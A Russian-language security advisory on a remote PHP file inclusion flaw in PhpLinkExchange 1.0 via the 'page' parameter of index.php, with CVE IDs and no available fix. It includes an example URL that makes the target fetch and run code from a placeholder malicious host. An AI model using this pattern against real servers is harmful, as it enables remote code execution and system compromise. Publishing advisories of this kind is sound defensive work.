PHP-инклюдинг в PhpLinkExchange

Дата публикации:
24.07.2006
Дата изменения:
17.10.2006
Всего просмотров:
4308
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
CVE-2006-3777
CVE-2006-4741
CVE-2006-4742
Вектор эксплуатации:
Удаленная
Воздействие:
Межсайтовый скриптинг
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
PhpLinkExchange 1.x
Уязвимые версии: PhpLinkExchange 1.0, возможно другие версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "page" в сценарии index.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Пример:

http://[victim]/index.php?page=http://[malicious_site]/file

URL производителя: idevspot.com/PhpLinkExchange.php

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: PhpLinkExchange remote File Inclusion Vuln

или введите имя

CAPTCHA